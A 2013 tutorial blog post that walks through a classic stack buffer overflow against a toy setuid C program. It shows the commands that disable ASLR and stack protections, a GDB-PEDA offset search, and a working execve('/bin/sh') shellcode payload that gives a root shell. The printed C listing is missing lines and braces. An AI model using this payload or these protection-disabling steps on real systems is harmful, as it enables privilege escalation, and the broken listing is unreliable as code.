Introduction to buffer overflows

Published on Sunday, 24 February 2013 in Security ; tagged with stack, shellcode, gdb, exploit, buffer, aslr, peda, bof, overflow, exec, security ; text version

Before starting

I know that buffer overflow is not a new hot topic from last week but it's so enormous that I really wanted to do something about it.

Thanks to the Most Expansive One-Byte Mistake, the NUL-byte defining the end of strings opens a whole new world.
By taking advantages of dummy functions like strcpy, we will be able to exploit a famous security flaw.
This security hole is called buffer overflow and it will be the topic of this paper.

I'm writing these words more as a reminder than a fully-documented expert whatever paper, but I hope it will help you.

Vulnerable program

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char buffer[256] = {0};

    if (argc < 2) {
        printf("Usage: %s username\n", argv[0]);

    /* strcpy doesn't check the size of the destination buffer */
    strcpy(buffer, argv[1]);
    printf("Your username is: %s\n", buffer);

    return 0;

The program above will be our example all along this paper.
It simply asks an username to display it (useless I know).

Here, the problem is that the function strcpy doesn't check if the source is bigger than the destination.
Therefore, the buffer overflow comes up.

But first, we have to remove some protections.
Current operating systems and compilers add some security routines to prevent this problem.
So, to be able to exploit our buffer overflow, I will remove them.

But don't think that thanks to these protections, this security flaw is not exploitable anymore! (see More?)
Our case is just an simple example to understand the process, but some buffer overflows are so well done that the protections don't prevent them.

depierre$ sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"
depierre$ gcc -fno-stack-protector -z execstack -m32 -o vulnerable_prog vulnerable_prog.c
  1. the first line disables ASLR which randomizes the offsets
  2. -fno-stack-protector allows us to overwrite the stack
  3. -z execstack allows the stack to be executable

We also allow the vulnerable program to setuid (i.e chmod +s).
It will allow us to gain the root's rights for our example.

Also, in this paper, I'm using a method which requires the stack to be executable.
You can check it using readelf as shown below.

depierre$ readelf -l vulnerable_prog

Type de fichier ELF est EXEC (fichier exécutable)
Point d'entrée 0x8048360
Il y a 8 en-têtes de programme, débutant à l'adresse de décalage52

En-têtes de programme:
  Type           Décalage Adr. vir.  Adr.phys.  T.Fich. T.Mém.  Fan Alignement
  PHDR           0x000034 0x08048034 0x08048034 0x00100 0x00100 R E 0x4
  INTERP         0x000134 0x08048134 0x08048134 0x00013 0x00013 R   0x1
      [Réquisition de l'interpréteur de programme: /lib/]
  LOAD           0x000000 0x08048000 0x08048000 0x00680 0x00680 R E 0x1000
  LOAD           0x000680 0x08049680 0x08049680 0x00120 0x00124 RW  0x1000
  DYNAMIC        0x00068c 0x0804968c 0x0804968c 0x000e8 0x000e8 RW  0x4
  NOTE           0x000148 0x08048148 0x08048148 0x00044 0x00044 R   0x4
  GNU_EH_FRAME   0x00059c 0x0804859c 0x0804859c 0x0002c 0x0002c R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4

 Section à la projection de segement:
  Sections de segment...
   01     .interp
   02     .interp .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
   03     .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss
   04     .dynamic
   05     .note.ABI-tag
   06     .eh_frame_hdr

GNU_STACK represents the stack of the program and as you can read, it's executable E.
If it wasn't, we couldn't have applied this method here.
But other ones can do that and maybe I'll write something about later.

Now let's focus and try different inputs.

depierre$ ./vulnerable_prog $(python2.7 -c "print 'A'*20")

Since the username doesn't exceed 256 characters, everything is ok.

depierre$ ./vulnerable_prog $(python2.7 -c "print 'A'*300")
Erreur de segmentation (core dumped)

As you can see, with an username 300 'A' long, the program stopped because of a SIGSEV (Segmentation fault).
Here is the buffer overflow.

Find the offset of the buffer

To see what happens inside the program, I use GDB with PEDA.

Knowing that strcpy will be the root of the buffer overflow, I break on it.

gdb-peda$ pset arg "'A'*4"
gdb-peda$ dis main
Dump of assembler code for function main:
   0x0804845c <+0>: push   ebp
   0x0804845d <+1>: mov    ebp,esp
   0x0804845f <+3>: push   edi
   0x08048460 <+4>: push   ebx
   0x08048461 <+5>: and    esp,0xfffffff0
   0x08048464 <+8>: sub    esp,0x110
   0x0804846a <+14>:    lea    ebx,[esp+0x10]
   0x0804846e <+18>:    mov    eax,0x0
   0x08048473 <+23>:    mov    edx,0x40
   0x08048478 <+28>:    mov    edi,ebx
   0x0804847a <+30>:    mov    ecx,edx
   0x0804847c <+32>:    rep stos DWORD PTR es:[edi],eax
   0x0804847e <+34>:    cmp    DWORD PTR [ebp+0x8],0x1
   0x08048482 <+38>:    jg     0x80484a5 <main+73>
   0x08048484 <+40>:    mov    eax,DWORD PTR [ebp+0xc]
   0x08048487 <+43>:    mov    eax,DWORD PTR [eax]
   0x08048489 <+45>:    mov    DWORD PTR [esp+0x4],eax
   0x0804848d <+49>:    mov    DWORD PTR [esp],0x8048570
   0x08048494 <+56>:    call   0x8048310 <printf@plt>
   0x08048499 <+61>:    mov    DWORD PTR [esp],0x1
   0x080484a0 <+68>:    call   0x8048340 <exit@plt>
   0x080484a5 <+73>:    mov    eax,DWORD PTR [ebp+0xc]
   0x080484a8 <+76>:    add    eax,0x4
   0x080484ab <+79>:    mov    eax,DWORD PTR [eax]
   0x080484ad <+81>:    mov    DWORD PTR [esp+0x4],eax
   0x080484b1 <+85>:    lea    eax,[esp+0x10]
   0x080484b5 <+89>:    mov    DWORD PTR [esp],eax
   0x080484b8 <+92>:    call   0x8048320 <strcpy@plt>
   0x080484bd <+97>:    lea    eax,[esp+0x10]
   0x080484c1 <+101>:   mov    DWORD PTR [esp+0x4],eax
   0x080484c5 <+105>:   mov    DWORD PTR [esp],0x8048584
   0x080484cc <+112>:   call   0x8048310 <printf@plt>
   0x080484d1 <+117>:   mov    eax,0x0
   0x080484d6 <+122>:   lea    esp,[ebp-0x8]
   0x080484d9 <+125>:   pop    ebx
   0x080484da <+126>:   pop    edi
   0x080484db <+127>:   pop    ebp
   0x080484dc <+128>:   ret
End of assembler dump.
gdb-peda$ break *0x80484b8
Breakpoint 1 at 0x80484b8
gdb-peda$ r
Starting program: vulnerable_prog 'AAAA'
EAX: 0xffffd650 --> 0x0
EBX: 0xffffd650 --> 0x0
ECX: 0x0
EDX: 0x40 ('@')
ESI: 0x0
EDI: 0xffffd740 --> 0xf7fa4000 --> 0x1acd9c
EBP: 0xffffd748 --> 0x0
ESP: 0xffffd630 --> 0xffffd650 --> 0x0
EIP: 0x80484b8 (<main+92>:  call   0x8048320 <strcpy@plt>)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
   0x80484ad <main+81>: mov    DWORD PTR [esp+0x4],eax
   0x80484b1 <main+85>: lea    eax,[esp+0x10]
   0x80484b5 <main+89>: mov    DWORD PTR [esp],eax
=> 0x80484b8 <main+92>: call   0x8048320 <strcpy@plt>
   0x80484bd <main+97>: lea    eax,[esp+0x10]
   0x80484c1 <main+101>:    mov    DWORD PTR [esp+0x4],eax
   0x80484c5 <main+105>:    mov    DWORD PTR [esp],0x8048584
   0x80484cc <main+112>:    call   0x8048310 <printf@plt>
Guessed arguments:
arg[0]: 0xffffd650 --> 0x0
arg[1]: 0xffffd991 ('AAAA'")
0000| 0xffffd630 --> 0xffffd650 --> 0x0
0004| 0xffffd634 --> 0xffffd991 ('AAAA')
0008| 0xffffd638 --> 0x8048258 ("__libc_start_main")
0012| 0xffffd63c --> 0xf7e04374 --> 0x72647800 ('')
0016| 0xffffd650 --> 0x0
0020| 0xffffd644 --> 0x0
0024| 0xffffd648 --> 0x0
0028| 0xffffd64c --> 0x0
Legend: code, data, rodata, value

Breakpoint 1, 0x080484b8 in main ()

The first parameter of strcpy is the destination buffer and the second one is the source.

Just before the call of the function, the parameters are pushed on the stack from the last one to the first.
So if we look at the stack, the top contains the offset of the buffer 0xffffd650.

Now let's find how the input should be long to redirect EIP.

Where are you EIP? Don't be afraid!

Let's start again with GDB and PEDA.

gdb-peda$ pset arg 'cyclic_pattern(300)'
gdb-peda$ break main
Breakpoint 1 at 0x8048461
gdb-peda$ r
Starting program: vulnerable_prog 'A%sA%nA%(A%)A%;A%0A%1A%2A%3A%4A%5A%6A%7A%8A%9A$sA$nA$(A$)A$;A$0A$1A$2A$3A$4A$5A$6A$7A$8A$9A-sA-nA-(A-)A-;A-0A-1A-2A-3A-4A-5A-6A-7A-8A-9AasAanAa(Aa)Aa;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbsAbnAb(Ab)Ab;Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9AcsAcnAc(Ac)Ac;Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9AdsAdnAd(Ad)Ad;Ad0Ad1Ad2Ad3Ad4'

pset arg 'cyclic_pattern(300)' is a PEDA command which will generate a string 300 characters long.
The wonderful thing here is that we don't have to brute force the length of the input to find when the program crashs because the command pattern_search will tell us everything!

gdb-peda$ continue
Your username is: A%sA%nA%(A%)A%;A%0A%1A%2A%3A%4A%5A%6A%7A%8A%9A$sA$nA$(A$)A$;A$0A$1A$2A$3A$4A$5A$6A$7A$8A$9A-sA-nA-(A-)A-;A-0A-1A-2A-3A-4A-5A-6A-7A-8A-9AasAanAa(Aa)Aa;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbsAbnAb(Ab)Ab;Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9AcsAcnAc(Ac)Ac;Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9AdsAdnAd(Ad)Ad;Ad0Ad1Ad2Ad3Ad4

Program received signal SIGSEGV, Segmentation fault.
EAX: 0x0
EBX: 0x63413563 ('c5Ac')
ECX: 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x37634136 ('6Ac7')
EBP: 0x41386341 ('Ac8A')
ESP: 0xffffd750 ("sAdnAd(Ad)Ad;Ad0Ad1Ad2Ad3Ad4")
EIP: 0x64413963 ('c9Ad')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
Invalid $PC address: 0x64413963
0000| 0xffffd750 ("sAdnAd(Ad)Ad;Ad0Ad1Ad2Ad3Ad4")
0004| 0xffffd754 ("Ad(Ad)Ad;Ad0Ad1Ad2Ad3Ad4")
0008| 0xffffd758 ("d)Ad;Ad0Ad1Ad2Ad3Ad4")
0012| 0xffffd75c (";Ad0Ad1Ad2Ad3Ad4")
0016| 0xffffd760 ("Ad1Ad2Ad3Ad4")
0020| 0xffffd764 ("d2Ad3Ad4")
0024| 0xffffd768 ("3Ad4")
0028| 0xffffd76c --> 0x0
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x64413963 in ?? ()

Looking at the stack, we can see that EBX have been overwritten, EDI too and so EBP, ESP and last but not least, EIP!

Well, in fact, we didn't overwrite EIP but ESP, which will redirect EIP.
If your knowledges about the stack are light, you just have to remember one thing.

When a program enters in a function, it has to remember where it comes from. So it will push on ESP the return offset.
Then, when it leaves the function (when it finds a RET instruction), EIP will take the value from ESP.

But here, EIP doesn't contain a valid offset but 0x64413963.
Knowing what's on the stack, we have to find how long should be the input to crush ESP.

gdb-peda$ pattern_search
Registers contain pattern buffer
EIP+0 found at offset: 268
EBX+0 found at offset: 256
EDI+0 found at offset: 260
EBP+0 found at offset: 264
Registers point to pattern buffer
[ESP] points to pattern offset: 272
Start of pattern buffer "A%sA" found at:
0xf7fd9012 (mapped)
0xffffd640 : $sp + -0x110 (-68 dwords)
0xffffd98f : $sp + 0x23f (143 dwords)
References to start of pattern buffer "A%sA" found at:
0xffffd620 : $sp + -0x130 (-76 dwords)
0xffffd628 : $sp + -0x128 (-74 dwords)
0xffffd634 : $sp + -0x11c (-71 dwords)
0xffffd7e8 : $sp + 0x98 (38 dwords)

See? pattern_search gives us every needed informations!
In order to overwrite EIP, we read the second line.
So after 268 bytes, the next 4 ones will overwrite EIP.

Let try with a simpler input.

gdb-peda$ pset arg "'A'*268 + 'B'*4"
gdb-peda$ r

Program received signal SIGSEGV, Segmentation fault.
EAX: 0x0
EBX: 0x41414141 ('AAAA')
ECX: 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x41414141 ('AAAA')
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd760 --> 0x0
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
Invalid $PC address: 0x42424242
0000| 0xffffd760 --> 0x0
0004| 0xffffd764 --> 0xffffd7f4 --> 0xffffd96f ("vulnerable_prog")
0008| 0xffffd768 --> 0xffffd800 --> 0xffffdabc ("XDG_VTNR=1")
0012| 0xffffd76c --> 0xf7ffcfc0 --> 0x20ef8
0016| 0xffffd770 --> 0x2f ('/')
0020| 0xffffd774 --> 0x0
0024| 0xffffd778 --> 0xf7fda2e8 --> 0xf7df7000 --> 0x464c457f
0028| 0xffffd77c --> 0x2
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()

As it is shown above, EBX, EDI and EBP are overwritten by the As and then, EIP is overwritten by the Bs.

To exploit the buffer overflow, we will redirect the EIP to a shellcode which will open a new shell.
This one will have the same rights as the owner (thanks to chmod +s) of the program (in our case root).

There are plenty of solutions where writing shellcodes. For instance you can save it in an environment variable.
Here, I will directly write it into the buffer and redirect the EIP on its beginning.


As we know, after writing 268 bytes in the buffer, the next 4 bytes will overwrite the EIP.
It's here that we will write the address pointing to the beginning of the buffer.
We will pad the first bytes with '\x90' (i.e. NOP instruction), write the shellcode, pad with some NOPs again and finally pad with the offset several times.

Therefore we have:

'\x90' * 100
'\x90' * 63
'\x50\xd6\xff\xff' * 22

I write 63 NOPs after the shellcode in order to pad the buffer but also to align the offset saved on the stack.
As you can see below, if I only write 62 NOP_s, the _EIP will not point where we want.
The last line of the shellcode is the offset repeated 22 times.
If you're asking why it is written backwards, it's because the OS uses little-endian encodage so the most significant byte is on the right.

gdb-peda$ pset arg "'\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90'*62 + '\x50\xd6\xff\xff'*22"
gdb-peda$ r
Your username is:                                                                                                     1 Ph//shh/bin  P  S
                                                                                                                   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P   P
Program received signal SIGSEGV, Segmentation fault.
EAX: 0x0
EBX: 0x50ffffd6
ECX: 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x50ffffd6
EBP: 0x50ffffd6
ESP: 0xffffd760 --> 0xffffd6
EIP: 0x50ffffd6
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
Invalid $PC address: 0x50ffffd6
0000| 0xffffd760 --> 0xffffd6
0004| 0xffffd764 --> 0xffffd7f4 --> 0xffffd96e ("vulnerable_prog")
0008| 0xffffd768 --> 0xffffd800 --> 0xffffdabe ("XDG_VTNR=1")
0012| 0xffffd76c --> 0xf7ffcfc0 --> 0x20ef8
0016| 0xffffd770 --> 0x2a ('*')
0020| 0xffffd774 --> 0x0
0024| 0xffffd778 --> 0xf7fda2e8 --> 0xf7df7000 --> 0x464c457f
0028| 0xffffd77c --> 0x2
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x50ffffd6 in ?? ()

As you can see, EIP doesn't point on 0xffffd650 but 0x50ffffd6.

gdb-peda$ x/300x $esp
0xffffd640: 0xffffd650  0xffffd9aa  0x08048258  0xf7e04374
0xffffd650: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd660: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd670: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd680: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd690: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd6a0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd6b0: 0x90909090  0x6850c031  0x68732f2f  0x69622f68
0xffffd6c0: 0x50e3896e  0x8953e289  0xcd0bb0e1  0x90909080
0xffffd6d0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd6e0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd6f0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd700: 0x90909090  0x90909090  0x50909090  0x50ffffd6
0xffffd710: 0x50ffffd6  0x50ffffd6  0x50ffffd6  0x50ffffd6
0xffffd720: 0x50ffffd6  0x50ffffd6  0x50ffffd6  0x50ffffd6
0xffffd730: 0x50ffffd6  0x50ffffd6  0x50ffffd6  0x50ffffd6
0xffffd740: 0x50ffffd6  0x50ffffd6  0x50ffffd6  0x50ffffd6
0xffffd750: 0x50ffffd6  0x50ffffd6  0x50ffffd6  0x50ffffd6
0xffffd760: 0x00ffffd6  0xffffd7f4  0xffffd800  0xf7ffcfc0
0xffffd770: 0x0000002a  0x00000000  0xf7fda2e8  0x00000002
0xffffd780: 0xffffd7f0  0xf7fa4000  0x00000000  0x00000000
0xffffd790: 0x00000000  0x8d59600b  0xb0f8641b  0x00000000
0xffffd7a0: 0x00000000  0x00000000  0x00000002  0x08048360
0xffffd7b0: 0x00000000  0xf7ff0c70  0xf7e10739  0xf7ffcfc0

So, with 63 NOPs instead of 62, we align the offset and EIP will contain 0xffffd650.

Exploit time!

Let's try with our correct buffer input.

gdb-peda$ pset arg "'\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90'*63 + '\x50\xd6\xff\xff'*22"
gdb-peda$ r
Starting program: vulnerable_prog '                                                                                                    1 Ph//shh/bin  P  S
                                                                                                                                                                                            `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   '
Your username is:                         1 Ph//shh/bin  P  S
                                                                                                                               `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `
process 27403 is executing new program: /bin/sh

As we were expecting, vulnerable_program has started a new shell /bin/sh.
Our gate is now opened!

Let's try outside GDB.

depierre$ ./vulnerable_prog $(python2.7 -c "print '\x90'*24 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90'*63 + '\x50\xd6\xff\xff'*40")
Your username is:                         1 Ph//shh/bin  P  S
                                                                                                                               `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `   `
Erreur de segmentation (core dumped)

Well well well, it has failed.

I asked some friends about why our exploit works in GDB but not outside.
The reason is that GDB adds some stuff when it debugs programs.
For instance, it will reserve some space for the local variables, more than they actually need.

Moreover, if we haven't deleted the protection from the operating system, the offset in the shellcode would have been wrong too, because the ones of the stack would have been randomized by the ASLR method.
Now you understand why I had to disable it exploiting the buffer overflow.

Fix the shellcode

You might be still wondering why I wrote 100 NOPs at the beginning of the buffer and now it's time to tell you.

Here, we are just dealing with the padding from GDB (ASLR disabled).
So one solution is to pad the beginning of the buffer in order to have a bigger area where to point and change the offset to point in the middle.
Then, we will expand our shellcode by writing the offset a little bit further.

With these modifications, we will prevent the buffer from translating and/or expanding.

'\x90' * 100
'\x90' * 63
'\xa4\xd6\xff\xff' * 40

Let's try one more time with our new shellcode.

depierre$ whoami
depierre$ ./vulnerable_prog $(python2.7 -c "print '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90'*63 + '\xa4\xd6\xff\xff'*40")
Your username is:                                                                                                     1 Ph//shh/bin  P  S

sh-4.2$ whoami

Here we are! Now we have a root shell on the computer using a buffer overflow from the program.

I hope you liked it as well as me when I exploited my first buffer overflow.

I know this paper doesn't go so deep into the topic but at least it has shown some of its aspects.
Also, as I said, I've written this more as a reminder than anything else.

More? License WTFPL2